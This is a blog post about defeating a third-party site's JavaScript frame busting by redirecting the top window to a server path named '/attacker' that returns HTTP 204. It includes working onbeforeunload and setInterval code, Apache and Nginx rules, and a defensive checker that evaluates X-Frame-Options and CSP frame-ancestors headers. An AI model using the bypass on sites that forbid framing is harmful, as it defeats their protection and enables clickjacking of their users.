Recently, a project required us to embed a third-party website (Renren, for example) in an IFRAME. The front-end engineer ran into a problem: the page would not stay inside the frame. When I looked into it, the cause was that the site uses frame busting, a script that breaks the page out of any frame it is loaded in.
I studied the problem further, and the cleanest workaround turned out to be based on the HTTP 204 status code.
The RFC description of 204 explains why it works:
The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant.
If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view.
In other words, a navigation that receives a 204 leaves the current document exactly where it is. So on the page that contains the IFRAME, hook onbeforeunload like this:
    // Counts every attempt by the framed page to navigate the top window away.
    var preventBusting = 0;
    window.onbeforeunload = function () { preventBusting++; };
    // Whenever a navigation is pending, point the top window at a URL that answers
    // 204 No Content; the browser cancels the pending navigation and keeps the
    // current document in place. 'http://yourwebserver/attacker' is the post's placeholder.
    setInterval(function () {
        if (preventBusting > 0) {
            preventBusting -= 2;
            window.top.location = 'http://yourwebserver/attacker';
        }
    }, 0.5);
If Apache is used, make the /attacker URL return 204. RedirectMatch belongs to mod_alias, so add the following after alias_module is loaded:
    RedirectMatch 204 attacker(.*)$
Nginx is similar:
    location = /attacker { return 204; }
Tested and working.
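The caveat from the defender's side: the 204 trick only defeats frame busting done in JavaScript, because the script's navigation can be cancelled. Framing policy enforced by the browser before any script runs (the X-Frame-Options header, or a Content-Security-Policy frame-ancestors directive) is not affected. The following check, added here as an example and not part of the original post, decides from a response's headers whether a browser would refuse to render the page inside a frame owned by a given parent origin. The sample headers and origins are constructed; the functions framingBlocked, sourceMatches and parseOrigin are this example's own names.

```javascript
// Added example: evaluate browser-enforced framing policy from response headers.
// Browsers that understand frame-ancestors ignore X-Frame-Options when both are present.

function parseOrigin(origin) {
  const u = new URL(origin);
  return {
    scheme: u.protocol.replace(':', ''),
    host: u.hostname,
    port: u.port || (u.protocol === 'https:' ? '443' : '80'),
  };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Does one frame-ancestors source expression permit the parent origin?
function sourceMatches(source, parent, self) {
  const s = source.trim().toLowerCase();
  if (s === "'none'") return false;
  if (s === '*') return true;
  if (s === "'self'") return sameOrigin(parent, self);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return parent.scheme === s.slice(0, -1); // scheme-only source, e.g. https:
  // host source: [scheme://][*.]host[:port]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme !== parent.scheme) return false;
  if (wildcard ? !parent.host.endsWith('.' + host) : parent.host !== host) return false;
  if (port && port !== '*' && port !== parent.port) return false;
  return true;
}

// true when the browser would refuse to render the page in a frame from parentOrigin.
function framingBlocked(headers, parentOrigin, selfOrigin) {
  const parent = parseOrigin(parentOrigin);
  const self = parseOrigin(selfOrigin);
  const get = (name) => (Object.entries(headers).find(([k]) => k.toLowerCase() === name) || [])[1];

  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      // An empty source list is equivalent to 'none'.
      const sources = directive.split(/\s+/).slice(1);
      return !sources.some((src) => sourceMatches(src, parent, self));
    }
  }

  const xfo = (get('x-frame-options') || '').trim().toUpperCase();
  if (xfo === 'DENY') return true;
  if (xfo === 'SAMEORIGIN') return !sameOrigin(parent, self);
  // No browser-enforced policy: only script-based frame busting remains, and that is
  // exactly what the 204 trick above cancels.
  return false;
}

// Constructed sample responses, keyed by a short label.
const SAMPLES = {
  deny: { 'X-Frame-Options': 'DENY' },
  sameorigin: { 'X-Frame-Options': 'SAMEORIGIN' },
  partners: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example" },
  cspWins: { 'Content-Security-Policy': "frame-ancestors 'none'", 'X-Frame-Options': 'SAMEORIGIN' },
  scriptOnly: { 'Content-Type': 'text/html' },
};

function demo() {
  const site = 'https://site.example';
  const result = {};
  for (const [label, headers] of Object.entries(SAMPLES)) {
    result[label] = {
      fromSelf: framingBlocked(headers, site, site),
      fromPartner: framingBlocked(headers, 'https://app.partner.example', site),
      fromOther: framingBlocked(headers, 'https://other.example', site),
    };
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

A page that shows `fromOther: false` relies entirely on JavaScript to stay out of foreign frames, which is the situation the post's 204 trick exploits; the fix is to set one of the two headers rather than to tune the script.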